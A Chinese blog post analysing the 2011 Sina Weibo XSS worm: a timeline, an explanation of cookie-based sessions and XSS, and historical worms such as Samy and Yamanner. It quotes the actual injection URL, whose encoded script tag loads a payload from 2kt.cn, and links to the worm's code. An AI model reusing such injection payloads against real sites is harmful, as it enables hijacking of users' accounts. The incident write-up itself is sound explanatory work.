XSS攻擊事件的經(jīng)過線索

20:14，開始有大量帶V的認(rèn)證用戶中招轉(zhuǎn)發(fā)蠕蟲

20:30，2kt.cn中的病毒頁面無法訪問

20:32，新浪微博中hellosamy用戶無法訪問

21:02，新浪漏洞修補(bǔ)完畢

新浪微博XSS攻擊事件

在這里，想和大家介紹一下XSS攻擊，XSS攻擊又叫跨站腳本式攻擊，你Google一下可以搜到很多很多的文章。我在這里就簡單地說一下。

首先，我們都知道網(wǎng)上很多網(wǎng)站都可以“記住你的用戶名和密碼”或是“自動登錄”，其實是在你的本地設(shè)置了一個cookie，這種方式可以讓你免去每次都輸入用戶名和口令的痛苦，但是也帶來很大的問題。試想，如果某用戶在“自動登錄”的狀態(tài)下，如果你運(yùn)行了一個程序，這個程序訪問“自動登錄”這個網(wǎng)站上一些鏈接、提交一些表單，那么，也就意味著這些程序不需要輸入用戶名和口令的手動交互就可以和服務(wù)器上的程序通話。這就是XSS攻擊的最基本思路。

再說一點，不一定是“記住你的用戶名和密碼”或是“自動登錄”的方法，因為HTTP是無狀態(tài)的協(xié)議，所以，幾乎所有的網(wǎng)站都會在你的瀏覽器上設(shè)置cookie來記錄狀態(tài)，以便在其多個網(wǎng)頁切換中檢查你的登錄狀態(tài)。而現(xiàn)在的瀏覽器的運(yùn)行方式是多頁面或多窗口運(yùn)行，也就是說，你在同一個父進(jìn)程下開的多個頁面或窗口里都可以無償和共享使用你登錄狀態(tài)的。

當(dāng)然，你不必過于擔(dān)心訪問別的網(wǎng)站，在別的網(wǎng)站里的js代碼會自動訪問你的微博或是網(wǎng)銀。因為瀏覽器的安全性讓js只能訪問自己所在網(wǎng)站的資源（你可以引入其它網(wǎng)站的js）。當(dāng)然，這是瀏覽器對js做的檢查，所以，瀏覽器并不一定會做這個檢查，這就是為什么IE6是史上最不安全的瀏覽器，沒有之一。只要你沒有在用IE6，應(yīng)該沒有這些問題。

XSS攻擊有兩種方法

一種就像SQL Injection或CMD Injection攻擊一樣，我把一段腳本注入到服務(wù)器上，用戶訪問方法服務(wù)器的某個URL，這個URL就會把遠(yuǎn)端的js注入進(jìn)來，這個js有可能自動進(jìn)行很多操作。比如這次事件中的幫你發(fā)微博，幫你發(fā)站內(nèi)消息等。注入有很多方法，比如：提交表單，更改URL參數(shù)，上傳圖片，設(shè)置簽名，等等。

另一類則是來來自外部的攻擊，主要指的自己構(gòu)造XSS 跨站漏洞網(wǎng)頁或者尋找非目標(biāo)機(jī)以外的有跨站漏洞的網(wǎng)頁。如當(dāng)我們要滲透一個站點，我們自己構(gòu)造一個跨站網(wǎng)頁放在自己的服務(wù)器上，然后通過結(jié)合其它技術(shù)，如 社會工程學(xué)等，欺騙目標(biāo)服務(wù)器的管理員打開。這一類攻擊的威脅相對較低，至少ajax 要發(fā)起跨站調(diào)用是非常困難的（你可能需要hack瀏覽器）。

這次新浪微博事件是第一種，其利用了微博廣場頁面 http://weibo.com/pub/star 的一個URL注入了js腳本，其通過http://163.fm/PxZHoxn短鏈接服務(wù)，將鏈接指向：http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

注意，上面URL鏈接中的其實就是<script src=//www.2kt.cn/images/t.js></script>。攻擊者并不一定是2kt.cn的人，因為.cn被國家嚴(yán)格管制（大家不知道coolshell.cn 的備案備了不知有多少次），所以，我個人覺得這個人不會愚蠢到用自己域名來做攻擊服務(wù)器。

XSS攻擊其它分析

初步發(fā)現(xiàn) Chrome 和 Safari 都沒中招。IE、Firefox未能幸免。史上最著名的XSS攻擊是Yahoo Mail 的Yamanner 蠕蟲是一個著名的XSS 攻擊實例。早期Yahoo Mail 系統(tǒng)可以執(zhí)行到信件內(nèi)的javascript 代碼。并且Yahoo Mail 系統(tǒng)使用了Ajax技術(shù)，這樣病毒javascript 可以的向Yahoo Mail 系統(tǒng)發(fā)起ajax 請求，從而得到用戶的地址簿，并發(fā)送攻擊代碼給他人。

為什么那個用戶叫hellosamy，因為samy是第一個XSS攻擊性的蠕蟲病毒，在MySpace上傳播。

新浪微博XSS攻擊的代碼在這里：06.28_sina_XSS.txt （編碼風(fēng)格還是很不錯的），請網(wǎng)民在微博娛樂的同時要注意安全問題。